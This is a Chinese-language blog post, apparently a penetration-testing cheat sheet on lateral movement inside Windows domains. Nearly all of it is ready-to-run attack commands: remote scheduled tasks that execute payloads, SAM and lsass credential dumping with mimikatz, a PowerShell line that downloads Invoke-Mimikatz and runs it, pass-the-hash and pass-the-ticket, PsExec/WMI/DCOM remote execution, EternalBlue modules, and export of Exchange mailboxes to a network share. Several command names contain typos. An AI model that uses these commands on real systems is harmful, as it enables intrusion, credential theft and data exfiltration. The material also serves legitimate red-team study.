域内横向移动分析


域内横向移动分析

常用 Windows 远程连接和相关命令

IPC

net use \\IP\ipc$ "password" /user:Administrator

IPC 的利用条件

  • 开启 139 端口
  • 管理员开启了默认共享

使用 Windows 自带的工具获取远程主机信息

dir 命令

dir \\IP\c$

tasklist 命令

tasklist /S IP /U administrator /P password

计划任务

at 命令

主要在 Windows server 2008 之前版本

查看目标系统时间
net time \\IP
将 payload 复制到目标系统中
copy payload.bat \\IP\C$
使用 at 命令创建计划任务
at \\IP 8:00AM C:\payload.bat

返回一个计划任务 ID

清除 at 记录
at \\IP taskID /delete

使用 at 将执行结果保存到远程,再读取结果:

at \\IP 8:00AM cmd.exe /c "ipconfig > C:/1.txt"
type \\IP\C$\1.txt

schtask 命令

建立 IPC 连接
创建名为 task 的计划任务
schtask /create /s IP /tn test /sc onstart /tr c:\payload.bat /ru system /f
执行该计划任务
schtask /run /s IP /i /tn "test"
删除计划任务
schtask /delete /s IP /tn "test" /f

Windows 系统散列值获取

单机密码抓取

GetPass

GetPassword_x64.exe

PwDump7

PwDump7.exe

通过 SAM 和 SYSTEM 文件抓取密码

导出 SAM 和 System 文件
reg save hklm\sam sam.hive
reg save hklm\system system.hive
通过读取 SAM 和 System 文件获得 NTLM Hash
  • mimikatz
lsadump::sam /sam:sam.hive system:system.hive
  • cain
  • 目标机器使用 mimikatz 直接读取本地 SAM 文件
privilege::debug
lsadump::sam
使用 mimikatz 在线读取 SAM 文件
mimikatz.exe "privilege::debug" "log" "sekurlsa::loginpasswords" 
使用 mimikatz 离线读取 lass.dmp 文件
导出 lass.dmp 文件
  • 使用任务管理器导出 lsass.dmp 文件

任务管理器找到 lsass.exe 进程,右键,选择 “Create Dump File” 选项

  • 使用 Procdump 导出 lsass.dmp 文件

微软官方发布的工具,免杀

Procdump.exe -accepteula -ma lsass.exe lsass.dmp
使用 mimikatz 导出 lsass.dmp 文件中的密码值
sekurlsa::mimidump lsass.dmp
sekurlsa::logonpasswords full

使用 Powershell 对散列值进行 Dump 操作

Import-Module .\Get-PassHashes.ps1

使用 Powershell 远程加载 mimikatz 抓取散列值和明文密码

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PwoerSploit/master/Exfilration/Invoke-Mimikatz.ps1');Invoke-Mimikatz"

哈希传递攻击

使用 NTLM Hash 进行哈希传递

mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:pentest.hacker /ntlm:[NTLM]"

使用 AES-256 密钥进行哈希传递

使用 mimikatz 抓取 AES-256 密钥

mimikatz "privilege::debug" "sekurlsa::ekeys"

pth攻击(目标机器必须安装 KB2871997)

mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:pentest.hacker /aes256:[aes256]"

票据传递

使用 mimikatz 进行票据传递

导出票据

mimikatz "privilege::debug" "sekurlsa::tickets /exports"

注入票据

mimikatz "kerberos::ptt" "C:\xxx.kirbi"

使用 kekeo 进行票据传递

生成票据文件

kekeo "tgt:ask /user:administrator /domain:pentest.hack /ntlm:[NTLM]"

将票据文件导入内存

kekeo "kerberos::ptt xxx.kirbi"

PsExec 的使用

PsTools 工具中的 PsExec

建立 IPC 连接

net use \\IP\ipc$ "password" /u:administrator

获取 System 权限的 交互式shell

PsExec.exe -accepteula \\IP -s cmd.exe
或
PsExec.exe -accepteula \\IP -s cmd.exe /c ipconfig

如果不使用 -s 命令,则创建一个 Administrator 权限的 shell

如果没有建立 IPC 连接:

PsExec.exe -accepteula \\IP -u administrator -p password -s cmd.exe

Metasploit 中的 psexec 模块

  • exploit/windows/smb/psexec
  • exploit/windows/smb/psexec_psh(powershell 版本)

WMI 的使用

基本命令

wmic /node:IP /user:administrator /password:passed process call create "cmd.exe /c ipconfig > ip.txt"

建立 IPC 连接后,使用 type 命令读取结果:

type \\IP\C$\ip.txt

impacket 包中的 wmiexec

wmiexec.py administrator:password@IP

wmiexec.vbs

半交互式 shell

cscript.exe //nologo wmiexec.vbs /shell IP administrator password

执行单条命令

cscript.exe wmiexec.vbs /cmd IP administrator password "ipconfig"

对于运行时间较长的命令,例如 pingsysteminfo,需要加入 -wait 5000 命令或者更长等待时间。在运行 nc 等不需要输出单需要一直等待运行的进程时,需要使用 -persist 参数。

Invoke-WmiCommand

powersploit工具包中

Invoke-Wmicommand.ps1 导入系统

$User = "pentest.hacker\administrator"

$Password = ConvertTo-SecureString -String "password" -AsPlainText -Force

$Cred = New-Object -TypeName System.Management.AutoMation.PSCredential -ArgumentList $User, $Password

$Remote = Invoke-WmiCommand -Payload {ipconfig} -Credential $Cred -ComputerName IP

$Remore.PayloadOutput

Invoke-WMIMethod

利用 powershell 自带的 Invoke-WMIMethod ,非交互,无回显。

$User = "pentest.hacker\administrator"

$Password = ConvertTo-SecureString -String "password" -AsPlainText -Force

$Cred = New-Object -TypeName System.Management.AutoMation.PSCredential -ArgumentList $User, $Password

$Remote = Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "calc.exe" -Credential $Cred -ComputerName IP

永恒之蓝漏洞

  • auxiliary/scanner/smb/smb_ms17_010
  • exploit/windows/smb/ms17_010_eternalblue

smbexec

C++ 版本 smbexec

execserver.exe 上传到到目标系统的 C:\Windows\ 目录下,解除 UAC 对命令的限制。

net use \\IP "password" /user:pentest\administrator
test.exe IP administrator password whoami c$

impacket 工具包中的 smbexec.py

smbexec.py penteer/administrator:password\@IP

DCOM 在远程系统中的使用

通过本地 DCOM 执行命令

获取 DCOM 程序列表

windows server 2012 及以上

Get-CimInstance Win32_DCOMApplicatioon

Windows 7、Windows Server 2008

Get-WmicObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication

使用 DCOM 执行任意命令

本地启动一个管理员权限的 powershell

[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","127.0.0.1")).Document.ActiveView.ExecuteShellCommand("cmd.exe","0","/c calc.exe","Minimzed")

使用 DCOM 在远程机器上执行命令

远程连接时必须使用具有本地管理员权限的账号

使用 IPC$ 连接远程计算机

net use \\IP "password" /user:pentest.hacker\win7user

执行命令

调用 MMC20_Application 远程执行命令
$com=[Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","IP"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe","0","/c calc.exe","Minimzed")

调用 9BA05972-F6A8-11CF-A442-00A0C90A8F39

$com=[Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"IP")
$obj=[System.Activator]::CreateInstance($com)
$item=$obj.item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32","$null",0)

SPN 在域环境中的使用

SPN 扫描

PowerShell-AD-Recon

利用 SPN 发现域中所有的 MSSQL 服务

Import-Module .\Discover-PSMSSQLServer.ps1
Discover-PSMSSQLServers

扫描域中所有的 SPN 信息

Import-Module .\Discover-PSInterestingServices.ps1
Discover-PSInterestingServices

在不使用第三方 Powershell 脚本的情况下,输入如下命令查询所有的 SPN 信息

setspn -T domain -q */*

Exchange 邮件服务器攻击

Exchange 服务发现

基于端口扫描发现

nmap -A -O -sV IP

SPN 查询

setspn -T pentest.hacker -F -Q */*

Exchange 的基本操作

查看邮件数据库

add-pssnapin microsoft.exchange*
Get-MailboxDatabase -server "Exchange1"

指定数据库,对其进行详细信息查询

Get-MailboxDatabase -Identify 'Mailbox Database 1894576043' | Format-List Name,EdbFilePath,LogFolderPath

获取现有用户的邮件地址

Get-Mailbox | format-tables Name,WindowsEmailAddress

查看指定用户的邮箱使用信息

Get-Mailboxstatistics -identify administrator | Select DisplayName,ItemCount,TotalItemSize,LastLogonTime

获取用户邮箱中的邮件数量

Get-Mailbox -ResultSize Unlimited | Get-MailboxStatistics | Sort-Object TotalItemSize -Decend

导出指定的电子邮件

配置用户的导入、导出权限

查看用户权限
Get-ManagementRoleAssignment -role "Mailbox Import Export" | Format-List RoleAssigneeName
添加权限
New-ManagementRoleAssignment -Name "Import Export_Domain Admins" -User "Administrator" -Role "Mailbox Import Export"
删除权限
New-ManagementRoleAssignment "Import Export_Domain Admins" -Confirm:$false

设置网络共享文件夹

net share inetpub=c:\inetpub /grant:everyone,full

导出用户的电子邮件

New-MailboxExportRequest -Mailbox administrator -FilePath \\IP\inetpub\administrator.pst

管理导出请求

查看之前的导出记录

Get-MailboxExportRequest

将指定用户的已完成导出请求删除

Remove-MailboxExportRequest -Identify Administrator\mailboxexport

将所有已完成导出的请求删除

Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest

文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
CVE-2020-1938 Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938 Apache Tomcat AJP 文件包含漏洞
CVE-2020-1938 Apache Tomcat AJP 文件包含漏洞漏洞复现环境搭建docker-compose.yml version: '2' services: tomcat: image: vulhub/tomcat
2020-02-21
下一篇 
权限提升防御分析 权限提升防御分析
权限提升防御分析系统内核溢出漏洞提权手动执行命令发现缺失补丁systeminfo wmic qfe get Caption,Description,HotfixID,InstalledOn 发现补丁编号 wmic qfe get Capti
2020-02-15
  目录